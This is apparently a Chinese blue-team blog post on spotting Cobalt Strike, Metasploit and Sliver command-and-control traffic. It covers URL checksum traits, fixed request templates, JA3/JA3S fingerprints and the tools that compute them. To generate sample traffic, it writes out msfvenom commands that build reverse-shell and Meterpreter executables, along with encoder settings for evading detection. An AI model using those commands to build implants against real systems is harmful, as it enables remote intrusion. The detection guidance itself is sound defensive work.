EthanDoctor

蓝队技能-流量分析篇&C2工具类&HTTPS协议&JA3&JA3S值&请求包体&MSF&CS&Sliver

Ethan医生4小时前信息收集4


 蓝队技能-流量分析-C2远控工具

#蓝队技能-流量分析-C2远控工具

C2:

MSF、CS、SliverViperHavocVshellSupershell

 

#CS

HTTP

https://blog.didierstevens.com/didier-stevens-suite

https://github.com/DidierStevens/DidierStevensSuite

python 1768.py xxxx.vir

2、请求特征:间隔时间 URL路径 下发指令 UA头(老版本)

/cx

POST /submit.php?id=

3、路径特征:checksum8 (92L 93L

public class EchoTest {

public static long checksum8(String text) {

if (text.length() < 4) {

return 0L;

}

text = text.replace("/", "");

long sum = 0L;

for (int x = 0; x < text.length(); x++) {

sum += text.charAt(x);

}

 

return sum % 256L;

}

 

public static void main(String[] args) throws Exception {

System.out.println(checksum8("Yle2"));

}

}

 

 

HTTPS:

1、证书特征(.store)

2、源码特征(ja3 ja3s

client hello 4d5efa96609dc906f796e63cff009c2a db36bad574044a5104a59b0c676991ef

server hello 15af977ce25de452b96affa2addb1036 2253c82f03b621c5144709b393fde2c9

 

 

#MSF

1、shell模式 明文传输

msfvenom -p windows/x64/shell/reverse_tcp lhost=xx lport=6666 -f exe -o 6666.exe

特征:从数据包明文中判断命令执行

 

2、meterpreter模式 HTTP

msfvenom -p windows/meterpreter/reverse_http lhost=xx lport=6667 -f exe -o 6667.exe

 

-UA头(版本决定)

Mozilla/5.0 (

 

-文件头

MZ标头和DOS模式异常

set enablestageencoding true

set stageencoder x86/shikata_ga_nai

 

特征:固定的数据包请求和返回模版(格式一致)

request和response返回的数据包格式一致

判断数据包的请求是不是固定的几个东西

GET /xxx(不固定) HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12.2; rv:97.0) Gecko/20100101 Firefox/97.0(固定的是Mozilla/5.0 (

Host: xx.xx.xx.xx:xxxx

Connection: Keep-Alive

Cache-Control: no-cache

 

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Connection: Keep-Alive

Server: Apache

Content-Length: 176220(不固定)

 

3、meterpreter模式 HTTPS

msfvenom -p windows/meterpreter_reverse_https lhost=xx lport=6669 -f exe -o 6668.exe

JA3/JA3S值:

4d93395b1c1b9ad28122fb4d09f28c5e 652358a663590cfc624787f06b82d9ae

15af977ce25de452b96affa2addb1036 2253c82f03b621c5144709b393fde2c9

 

#Sliver

使用视频:162

使用参考:https://forum.butian.net/share/2243

项目下载:https://github.com/BishopFox/sliver

分析参考1:https://mp.weixin.qq.com/s/9PuyKtwY5WbjAGLbLHUmuw

分析参考2:https://mp.weixin.qq.com/s/G3ggCKxQy0nOqRuTUPHfiQ

 

HTTP:

路径特征:server\configs\http-c2.go

固定url路径

参数名称的构造规律

参数值的长度及规律

sessionID/Cookie的交换

Cookie的名称生成、cookie值的长度及规律

 

根据路径文件名,后缀,cookie这些信息到源码里面的数组随机组合配合分析排查

 

HTTPS:

ja3/ja3s

19e29534fd49dd27d09234e639c4057e

f4febc55ea12b31ae17cfb7e614afda8

 

https://github.com/salesforce/ja3

https://github.com/Macr0phag3/ja3box

d:\Python3.8\python.exe ja3.py -a https.pcapng

d:\Python3.8\python.exe ja3s.py -a https.pcapng


标签: 蓝队技能
返回列表

上一篇:蓝队技能-流量分析篇&WebShell工具类&数据解密&特征研判&哥斯拉&天蝎&冰蝎&蚁剑

下一篇:蓝队技能-流量分析篇&内网隧道工具 类&版本标记&字符特征&FRP&NPS&reGeorg&Venom

相关文章

蓝队技能-设备部署篇&雷池WAF保护Web&蜜罐HFish溯源&堡垒机JumpServer资产管理

➢ 蓝队技能-设备部署-WAF-Web-雷池➢ 蓝队技能-设备部署-蜜罐-服务-HFish➢ 蓝队技能-设备部署-堡垒机-JumpServer#WAF-雷池SafeLin...

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

蓝队技能-应急响应篇&Web入侵指南&后门查杀&日志分析&流量解密&攻击链梳理&排查口

➢ 蓝队技能-Web入侵-入口&查杀&攻击链等#Web攻击事件获取当前WEB环境的组成架构(脚本,数据库,中间件,系统等)分析思路:1、利用时间节点筛选日志行为2、利用对漏洞...

蓝队技能-流量分析篇&WebShell工具类&数据解密&特征研判&哥斯拉&天蝎&冰蝎&蚁剑

➢ 蓝队技能-流量分析-WebShell工具#蓝队技能-流量分析-WebShell工具WebShell工具类:菜刀,蚁剑,冰蝎,天蝎,哥斯拉菜刀:https://mp.weixin.qq.c...

蓝队技能-应急响应篇&日志采集&提取查看&自动化分析Web安全&内网攻防&工具项目

➢ 蓝队技能-工具项目-日志收集&提取查看&自动分析#日志自动提取1、七牛Logkit:(Windows&Linux&Mac等)项目地址:https://gi...

蓝队技能-应急响应篇&ELK系统&日志采集分析&Yara规则&样本识别&特征提取&规则编写

➢ 蓝队技能-工具项目-ELK日志系统&采集分析&导入分析➢ 蓝队技能-工具项目-Yara威胁感知&规则解析&规则开发#ELK专业系统日志分析Ela...

蓝队技能-应急响应篇&钓鱼攻击&邮件与文件&EML还原&蠕虫分析&线索定性&处置封锁

➢ 蓝队技能-钓鱼攻击-邮件&附件&分析&排查&应急#钓鱼邮件如何分析邮件安全性:1、看发信人地址2、看发信内容信息3、看发信内容附件4、查询发信域名反制&n...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Copyright Your hacksec.top Rights Reserved.

Powered By Z-BlogPHP. - 鄂ICP备2025099786号